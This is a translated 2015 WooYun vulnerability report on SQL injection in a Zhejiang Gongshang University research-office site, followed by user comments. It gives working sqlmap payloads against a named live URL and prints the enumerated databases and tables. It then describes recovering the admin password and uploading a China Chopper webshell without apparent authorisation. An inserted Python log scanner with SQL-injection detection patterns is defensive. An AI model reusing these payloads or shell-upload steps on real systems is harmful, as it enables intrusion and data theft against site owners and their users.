
Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-092377

Title: SQL injection on a Zhejiang Gongshang University site, shell obtained

Vendor: Zhejiang Gongshang University (浙江工商大学)

Author: Ton7BrEak

Submitted: 2015-01-19 14:16

Fix time: 2015-01-24 14:18

Published: 2015-01-24 14:18

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: handed over to a third-party partner (CCERT, the education network emergency response team) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-01-19: Details sent to the vendor; awaiting vendor handling
2015-01-24: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

SQL injection on a Zhejiang Gongshang University site #01

Detailed description:

001x Injection point
http://kyc.zjgsu.edu.cn/kyc_new/notify.do?ActionMethod=view&id=1543

Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ActionMethod=view&id=1543' AND 6962=6962 AND 'tdtU'='tdtU
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: ActionMethod=view&id=-2556' UNION ALL SELECT 28,CHAR(58) CHAR(118) CHAR(118) CHAR(110) CHAR(58) CHAR(112) CHAR(104) CHAR(110) CHAR(102) CHAR(122) CHAR(76) CHAR(90) CHAR(69) CHAR(101) CHAR(104) CHAR(58) CHAR(97) CHAR(109) CHAR(110) CHAR(58),28,28--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: ActionMethod=view&id=1543'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: ActionMethod=view&id=1543' WAITFOR DELAY '0:0:5'--
---
[10:30:07] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2000
[10:30:07] [INFO] fetching database names
[10:30:07] [INFO] the SQL query used returns 7 entries
[10:30:07] [INFO] resumed: "kyc"
[10:30:07] [INFO] resumed: "master"
[10:30:07] [INFO] resumed: "model"
[10:30:07] [INFO] resumed: "msdb"
[10:30:07] [INFO] resumed: "Northwind"
[10:30:07] [INFO] resumed: "pubs"
[10:30:07] [INFO] resumed: "tempdb"
available databases [7]:
[*] kyc
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
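As an added example (not part of the original report), the Python below shows how a defender could flag the payload families sqlmap used above against notify.do in web-server access logs: a non-numeric id plus the boolean-blind, UNION, CHAR() chain, stacked-query and WAITFOR DELAY shapes. The log lines, the client IP and the sizes are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log sample (not from the report): one benign request to
# notify.do followed by requests carrying the boolean-blind, UNION and
# WAITFOR DELAY payload shapes that sqlmap reported above.
SAMPLE_LOG = """\
10.0.0.5 - - [19/Jan/2015:10:30:01 +0800] "GET /kyc_new/notify.do?ActionMethod=view&id=1543 HTTP/1.1" 200 5120
10.0.0.5 - - [19/Jan/2015:10:30:07 +0800] "GET /kyc_new/notify.do?ActionMethod=view&id=1543%27%20AND%206962%3D6962%20AND%20%27tdtU%27%3D%27tdtU HTTP/1.1" 200 5120
10.0.0.5 - - [19/Jan/2015:10:30:08 +0800] "GET /kyc_new/notify.do?ActionMethod=view&id=-2556%27%20UNION%20ALL%20SELECT%2028%2CCHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2C28%2C28-- HTTP/1.1" 200 5300
10.0.0.5 - - [19/Jan/2015:10:30:09 +0800] "GET /kyc_new/notify.do?ActionMethod=view&id=1543%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- HTTP/1.1" 200 5120
"""

# Payload families taken from the sqlmap output above (MSSQL-flavoured).
SQLI_PATTERNS = {
    "boolean-blind": re.compile(r"'\s*(?:AND|OR)\s+\d+\s*=\s*\d+", re.I),
    "union-select": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "mssql-time-delay": re.compile(r"\bWAITFOR\s+DELAY\b", re.I),
    "char-concatenation": re.compile(r"(?:CHAR\(\d+\)\s*\+?\s*){3,}", re.I),
    "stacked-query": re.compile(r"'\s*;"),
}

# Common/combined log format request field: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def scan_request_target(target, numeric_params=("id",)):
    """Return sorted reasons why a request target looks like SQL injection;
    an empty list means clean. parse_qs percent-decodes the values, so the
    patterns are matched against what the application would actually see."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    reasons = set()
    for name, values in query.items():
        for value in values:
            # notify.do's id should be an integer; a quote or letters in it
            # is the first signal, independent of any payload signature.
            if name in numeric_params and not value.lstrip("-").isdigit():
                reasons.add(f"{name}: non-numeric value")
            for label, pattern in SQLI_PATTERNS.items():
                if pattern.search(value):
                    reasons.add(f"{name}: {label}")
    return sorted(reasons)


def scan_log(text):
    """Return [(line_number, reasons)] for every suspicious request line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if match:
            reasons = scan_request_target(match.group("target"))
            if reasons:
                findings.append((lineno, reasons))
    return findings
```

The same scanner runs unchanged over a real access log once the benign request is excluded by the numeric check rather than by a signature, so it also catches payloads sqlmap obfuscates with tamper scripts only where they still break the integer form of id.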


002x Databases enumerated; next step is to check privileges

(screenshot: 001.jpg)


003x All tables in the current database

Database: kyc
+----------------------+---------+
| Table | Entries |
+----------------------+---------+
| dbo.[Work] | 9471 |
| dbo.oldwork | 6563 |
| dbo.ProjectPoints | 3385 |
| dbo.Journal | 1831 |
| dbo.Journal_temp | 1824 |
| dbo.GroupUser | 1629 |
| dbo.newTable1 | 1545 |
| dbo.RegUser | 1545 |
| dbo.OutlayDetail | 1345 |
| dbo.pointshz | 1295 |
| dbo.notify | 1209 |
| dbo.Outlay | 1091 |
| dbo.Award | 592 |
| dbo.[??] | 290 |
| dbo.news | 257 |
| dbo.Communication | 252 |
| dbo.TypePoints | 113 |
| dbo.priv | 82 |
| dbo.func | 51 |
| dbo.College | 46 |
| dbo.Department | 46 |
| dbo.document | 43 |
| dbo.sort | 39 |
| dbo.fff | 38 |
| dbo.RankTypeObj | 33 |
| dbo.Tables | 29 |
| dbo.AwardTypeObj | 25 |
| dbo.OrderTypeObj | 22 |
| dbo.pbcatedt | 21 |
| dbo.kill_kk | 20 |
| dbo.pbcatfmt | 20 |
| dbo.PrjSource | 20 |
| dbo.sere | 20 |
| dbo.PrjRank | 19 |
| dbo.WorkMember | 15 |
| dbo.zlmb_tr | 15 |
| dbo.orgs | 14 |
| dbo.SignTypeObj | 12 |
| dbo.manager | 10 |
| dbo.download | 9 |
| dbo.kyjhhyh | 9 |
| dbo.WcTypeObj | 9 |
| dbo.AwardSignTypeObj | 6 |
| dbo.IndexTypeObj | 6 |
| dbo.PrjAwdRatio | 6 |
| dbo.ProductionType | 6 |
| dbo.stuff | 6 |
| dbo.sysconstraints | 6 |
| dbo.BookWcTypeObj | 5 |
| dbo.glgz | 5 |
| dbo.status | 5 |
| dbo.UserGroup | 5 |
| dbo.[level] | 3 |
| dbo.dlmb_tr | 3 |
| dbo.syssegments | 3 |
| dbo.harvest | 2 |
| dbo.prjlevel | 2 |
| dbo.project | 2 |
| dbo.D99_REG | 1 |
| dbo.depart_z | 1 |
| dbo.guizu | 1 |
| dbo.kycxcl | 1 |
+----------------------+---------+


004x Locate the admin panel, recover the administrator password and log in
http://kyc.zjgsu.edu.cn/kyc_new/login.do

Proof of vulnerability:

001x The site appears to have been compromised before

(screenshot: 002.jpg)


002x Upload point: a JSP China Chopper webshell was uploaded directly; no filtering of any kind

(screenshot: 001.jpg)


(screenshot: 002.jpg)


Fix recommendations:

Guard against SQL injection; validate uploads on the server side

Copyright notice: please credit the source when reposting: Ton7BrEak@乌云


Vulnerability response

Vendor response:

Severity: No impact, vendor ignored

Ignored at: 2015-01-24 14:18

Vendor reply:

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2015-01-19 23:27 | xq17 ( Passer-by | Rank:14 Vulns:3 | newbie xq17 is here to learn from the masters )

    Would love to exchange ideas

  2. 2015-01-20 10:46 | Ton7BrEak ( Regular white hat | Rank:211 Vulns:43 | Hard-working; I only know how to be first! )

    @xq17 Just another newbie here too~

  3. 2015-05-12 15:05 | 明月影 ( Passer-by | Rank:12 Vulns:8 | Learning techniques, learning approaches. )

    @Ton7BrEak Three vulnerabilities for 112 points, you're a master!!!

  4. 2015-05-12 15:08 | Ton7BrEak ( Regular white hat | Rank:211 Vulns:43 | Hard-working; I only know how to be first! )

    @明月影 Later on a lot of my vulnerabilities got ignored, so I published them all anonymously~ I meant to switch the ones that weren't ignored to non-anonymous, but then I couldn't be bothered~ I'll just go anonymous from now on~